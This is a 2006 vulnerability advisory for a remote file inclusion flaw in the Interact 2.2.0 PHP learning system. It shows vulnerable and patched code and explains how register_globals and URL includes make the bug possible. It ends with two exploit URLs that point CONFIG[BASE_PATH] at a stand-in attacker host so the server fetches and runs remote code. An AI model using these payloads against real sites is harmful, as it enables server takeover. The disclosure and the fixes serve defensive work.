interact <= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability

2006.08.31
Credit: CarcaBotx
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +
- - - [Romanian Electronic Network Security Lab Team ThE Best Romanian Hacking Team] - - +
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +
- Cce-interact <= 2.2.0 (CONFIG[BASE_PATH]) Remote File Include Vulnerability +
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +
- [Script name: Interact - Online Learning and Collaboration System v. 2.2.0
- [Script site: https://sourceforge.net/projects/cce-interact/ +
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +
- Find by: CarcaBot +
- Contact: CarcaBotx (at) yahoo (dot) com [email concealed] - or - http://Hacking.CarcaBot.ro +
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +
- Special Greetz: CarcaBot - http://Hacking.CarcaBot.ro - +
*/

/*
vulnerable code => admin/autoprompter.php line 33-38:

....
require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc.php');
require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php');
$rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key, {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey, {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey, {$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt, {$CONFIG['DB_PREFIX']}posts.subject, {$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key, {$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThreadManagement.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name, {$CONFIG['DB_PREFIX']}posts.added_by_key FROM {$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CONFIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON {$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key WHERE {$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX']}posts.post_key AND {$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpaceLinks.ModuleKey AND {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Spaces.SpaceKey AND {$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL {$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND {$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY {$CONFIG['DB_PREFIX']}posts.post_key");
....

Fix Exploit: admin/autoprompter.php line 33-38:

....
require_once('../local/config.inc.php');
require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc.php');
require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php');
$rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key, {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey, {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey, {$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt, {$CONFIG['DB_PREFIX']}posts.subject, {$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key, {$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThreadManagement.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name, {$CONFIG['DB_PREFIX']}posts.added_by_key FROM {$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CONFIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON {$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key WHERE {$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX']}posts.post_key AND {$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpaceLinks.ModuleKey AND {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Spaces.SpaceKey AND {$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL {$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND {$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY {$CONFIG['DB_PREFIX']}posts.post_key");
....

vulnerable code => includes/common.inc.php line 35-40:

....
$CONFIG['ADODB_PATH'] = $CONFIG['BASE_PATH'].'/includes/adodb';
//Include database abstraction classes
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');
....

Exploit Fix: includes/common.inc.php line 35-40:

....
require_once('../local/config.inc.php');
$CONFIG['ADODB_PATH'] = $CONFIG['BASE_PATH'].'/includes/adodb';
//Include database abstraction classes
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');
....

Note: both excerpts use $CONFIG['BASE_PATH'] before the configuration file has been loaded, so the value is undefined when the script is requested directly. Filling it from the query string appears to depend on PHP's register_globals being enabled, and fetching a remote file depends on URL includes being allowed (allow_url_fopen); turning both off blocks this class of bug independently of the patch. The fix path '../local/config.inc.php' is relative and is resolved against the working directory of the requested script, so check that it reaches the real configuration file from every script that includes includes/common.inc.php.
*/

#Exploit:
http://www.site.com/[Cce-interact_path]/admin/autoprompter.php?CONFIG[BA SE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[Cce-interact_path]/includes/common.inc.php?CONFIG[B ASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]

### End of File ###
### http://Hacking.CarcaBot.ro ###

